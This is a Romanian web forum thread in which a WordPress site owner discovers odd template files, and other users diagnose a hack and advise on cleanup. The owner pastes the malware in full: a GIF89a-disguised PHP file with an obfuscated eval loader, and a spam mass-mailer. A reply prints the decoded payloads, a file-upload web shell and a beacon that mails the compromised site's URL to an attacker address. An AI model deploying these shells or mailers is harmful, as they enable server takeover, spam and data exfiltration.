Probleme footer si template-uri

**flavius1990** · 27th October 2012, 20:52

Am intampinat cateva probleme la noul site pe care incerc sa il dezvolt. Anume: In footer am vazut ca a aparut ceva eroare de cod, si imi spune ca problema este la linia 117. Am incercat sa verific in meniul templates la sectiunea footer dar nimic. O alta problema in meniul templates au aparut 6 noi .php-uri, toate au o denumire total aiurea, ceva de genul: external_328fdsfsd764873cxvcx52423.php. Nu stiu cum sa scap de ele. Daca este relevant, astazi am incarcat in root-ul sitului un fisier .htacces creat de mine pentru ca nu l-am gasit pe cel vechi, si am bifat optiunea replace. Nici dupa ce l-am urcat nu l-am gasit, si ma gandeam ca ar fi putut exista si inainte, si sa nu fi avut acolo niste date initial iar eu prin bifarea optiunii replace sa fi urcat un .htacces diferit. Daca ma puteti ajuta cu problemele astea ar fi minunat. Multumesc.

**Calin B** · 28th October 2012, 00:12

Poti sa ne spui ce cms folosesti pentru a te putea ajuta? Multumesc

**flavius1990** · 28th October 2012, 08:17

Wordpress, prima problema am rezolvat-o.Ma mai deranjeaza templateurile cu numele external4328432nbfdsbg.php

**Cristi G** · 28th October 2012, 11:58

Cred ca ti-a fost hack-uit site-ul, verifica-ti versiunea de WP si a plugin-urilor sa fie ultima. Si, poti deschide si fisierele alea sa vezi daca au vreun cod encryptat sau ceva.

**Scorpio2k2** · 28th October 2012, 12:13

@flavius1990 - verifica si fisierul .htaccess. Este posibil sa ai ceva adaugat si acolo.

**flavius1990** · 28th October 2012, 12:31

Wordpress-ul si toate plugin-urile sunt up to date. Am deschis template-urile si din cate vad toate folosesc gif89a ca si metoda de criptare. In .htacces habar nu am la ce sa ma uit, stiu doar ca am adaugat ieri cod acolo din ghidul wordpress scris de Tudi.
L.E: Ii clar, mi-a fost hackuit situl, de fapt nu sunt doar 7 templateuri extrernal.php, au mai creat vreo 3, si aici se poate citi clar au pus follow,si index la tot ce este pe blog. Nu am nicio idee cum sa scap de astea.Daca poate sa ma ajute cineva, as fi dispus sa il las sa se logheze el pe root.

**Calin B** · 28th October 2012, 12:40

poti sa ne arati ce este scris intr-un fisier?

**flavius1990** · 28th October 2012, 12:46

GIF89a?????????????????????!??????????????,??? ??????????????????D???;???
<?php
$language = 'eng';
$auth = 0;
$name = ''; // md5 Login
$pass = ''; // md5 Password
/************************************************** ************************************************** ************************************************** ********/
error_reporting(0);
$airmata="ekNfWMMwEH9psO9jDYO0oJsvPnqtV9nGQzZu7qmU krYpDbRWdRNuit/dpNmkoJDA3f3+HVSLTQBe5dGOl4LTnhEOsSh2t8q7yH48l7XMN Cct9YM5HsaLPMLL6YQ6eiW6FlWhmOAhT9BFSIsyUUX0CgHlhTp YGqJJN4pW0qmF5d+VUREE1jVRTTaCmFUErBxo4wzGpUngnCrW0 KvU1T37NPXDPYouUQdzxgpdUb3OW6Zcgpt/kFMb4DTEGeWw15DJKh9z2dvh+J5gy8UphCFcmRDA12dlcFVChZ B0f5Z6aa/rcILtLjhasHdycxfA6S38AR0QGA+g19Pvt8/xbb8Fz/Psdn8vv4RiE1Gbno7Zm0b88j/VvMfoBw==";
eval(gzinflate(str_rot13(base64_decode($airmata))) );
?>
<? eval(gzinflate(base64_decode('jVHZbsIwEHyv1H+wLCSD 2oR3Sjkq0oJUjoZQqSrIMsmWGOIYOe7B33dNEIf60ifbO7Mzu+ N2izTb11cVKxXwIoUsI/eEUj8RFqo0qav6G/FIvyEbBa35lN4hV265AaUtILXCp0H4GoTvNAyG4yjg3V4vpAtH +zBalZKxTpDL1iLe8LVIhfXiVOQr8ESiZO6ttVaZuPnWZmug6D B/BTbVhV3ucqGgerRg5clH3WHAFjWfMWdjNQclpJubbbSSP3qZdl au4sda7SkFmC8w/MDC7f5pQAnuTv0T3o+iCe+PpxFbHLLIZL6JjVMdSfKgC/KMBTLaCdK46LxQxt4zKAxeZsE04rNw4CC0HEzIG+ZDnj5zIXNU OovcIxF+FZZOP7YfJAWRwH6QR8wd8cv452aeh7DNdp7Vf0An0H HpVI9p3pLz1PBVLoqX0qiGLe1Ws/0L'))); ?>

asta e scris intr-un fisier de tip external54837gjfhjkh5643jghfd.php

<?php
@session_start();
$create_password = true;
$password = base64_decode("ZGFuY29r");$pass=$_POST['pass'];if($pass==$password){$_SESSION['r3c0n']="$pass";}
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['r3c0n']) or $_SESSION['r3c0n']!=$password){
die("<title>..:: Andalas_oku ::..</title>
<META http-equiv=\"content-type\" content=\"text/html;charset=iso-8859-1\">
<META content=\"mailer\" name=\"author\">
<META name=\"rating\" content=\"general\" />
<META http-equiv=\"pragma\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"cache\" />
<META http-equiv=\"cache-control\" content=\"must-revalidate\" />
<META http-equiv=\"cache-control\" content=\"proxy-revalidate\" />
<META name=\"MSSmartTagsPreventParsing\" content=\"true\" />
<META name=\"robots\" content=\"all,index,follow\" />
<META name=\"googlebot\" content=\"all,index,follow\" />
<META name=\"allow-search\" content=\"yes\" />
<META name=\"audience\" content=\"all\" />
<META name=\"revisit\" content=\"2 days\" />
<META name=\"revisit-after\" content=\"2 days\" />
<META name=\"author\" content=\"mailer\" />
<META name=\"copyright\" content=\"mailer\" />
<META name=\"creator\" content=\"mailer\" />
<META name=\"generator\" content=\"mailer\" />
<META http-equiv=\"Reply-to\" content=\"\" />
<META name=\"distribution\" content=\"global\" />
<META name=\"classification\" content=\"..:: Andalas_oku ::.., Powered by andalas_oku\" />
<META name=\"document-classification\" content=\"general\" />
<META name=\"rating\" content=\"general\" />
<meta name=\"description\" content=\"..:: Andalas_oku ::.. Powered by andalas_oku\" />
<META content=\"index, follow\" name=\"robots\">
<META content=\"..:: Andalas_oku ::..,mailer\" name=\"keywords\">
<META name=\"dc.title\" content=\"..:: Andalas_oku ::..\" />
<META name=\"dc.creator.e-mail\" content=\"ncayo8@gmail.com\" />
<META name=\"dc.creator.name\" content=\"mailer\" />
<body text=\"#FFFFFF\" bgcolor=\"#000000\" background=\"black\">
<br><br><br><br><br><br><br><br><br><br><br><cente r>
<table width=100 bgcolor=\"black\" border=1 bordercolor=\"white\"><tr><td>
<font size=1 face=verdana><center><b><font color=red>
..:: mailer secure mail ::..</font></a><br><br></b></center>
<form method=post>Password:<br><input type=password name=pass size=30 tabindex=1>
</form><font color=red><b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
<font color=red><b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
<font color=red><b>Your ip:</b> ".$ip."</td></tr></table>");}}

if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">

</style>
<style type="text/css">

</style>
</head>
<body bgcolor="#000000" text="#ffffff">
<span class="style1"><center>
| + | andalas_oku | + |
</center>
<br></span></p>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<input type="hidden" name="action" value="send">
<br>
<table width="100%" border="0">
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Email:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>"
size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Nama:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply:</font></div>
</td>
<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
<td width="31%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="10%">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="109">
</font></td>
</tr>
<tr>
<td width="10%" valign="top">
<div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Mail:</font></div>
</td>
<td width="18%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<textarea name="message" cols="50" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
Text
<input name="contenttype" type="radio" value="html" checked>
HTML
<input type="submit" value="Send to Inbox">
</font></td>
<td width="31%" valign="top">
<div align="right">
<font face="Verdana, Arial,
Helvetica, sans-serif" size="-3">Mail to:</font></div>
</td>
<td width="41%" valign="top"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea></font></td>
</tr>
</table>
</form>
<?
if ($action){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);

for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print " $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Terkirim<br>";
flush();
}
}
}

?>
<style type="text/css">

</style><center>
<p class="style1">Jatimcrew</center></p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo
"<script>alert('Semua Email telah dikirim\\r\\nTotal Email terkirim $numemails\\r\\nSelesai boss');
</script>";}
?>
</body>
</html>

asta intr-un tmp.php

template-urile astea nici macar nu apar daca vreau sa le sterg din root

**rnicolescu** · 28th October 2012, 13:05

base64_decode:

Cod PHP:


&#54361;n°|ତ㿪ݨ䫊    R:B䫠˦Xc蠧뇽ݴB눟l￷h㍽uqRែ(R¿xE#ᑪ㊚벑ڟ鍢v됚Rҋ\*tᨎ〈n2⺀̖夬S䲵跼-R!}x幊쑨黫mU殾u隨:ﰿ6Յ]ິ`則ݡ5ﱧc5%䛛m䒿z鿿ڻ띫䤖`샳繥�'黴Oz>觾>셬rˡ⺦5Lu'ʀ/ʰ˨'J㢱Cx̠1y넓ꍃq3 o鎸錅Ϳ㨽±ᙤ㻡’鄼_i軌ש헴}캕#ڷ伵<K⥴ꡋ{U쿂�

Chinezi!

Scaneaza calculatorul, schimba parola de ftp, repune fisierele inapoi. Foloseste un client de ftp bun! Nu retine parolele in clientul de ftp.

Si ca sa fiu rau: use Linux! Pus pe un vmware, face minuni la transfer fisiere!

**inSecure** · 28th October 2012, 13:16

rnicolesc,

Nu sunt chinezi sunt indonezieni(e codat de mai multe ori):
Primul decode:
<?php
echo '<b>Indonesian Coder<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>NGACENG !!!</b><br><br>'; }
else { echo '<b>FUCK !!!</b><br><br>'; }
}
?>
?>

Al 2lea decode:
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode ='jack_jahat-change-admin-joomla+worpres@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
?><?
?>

Uite-i si mailul

P.S.: Ori reinstalezi totul de la 0, ori faci curatenie (e mai greu), sau daca ai un backup mai vechi foloseste-l pe ala (probabil ai vreun template luat de pe un site mai dubios, nu cred ca e exploit).

Subiect: Probleme footer si template-uri

Instrumente subiect

Afișează

Probleme footer si template-uri

Informații subiect

Utilizatori care navighează în acest subiect

Thread-uri Similare

Theme footer links!!!

internal linking in footer

Decodare footer

spam la greu in footer

Permisiuni postare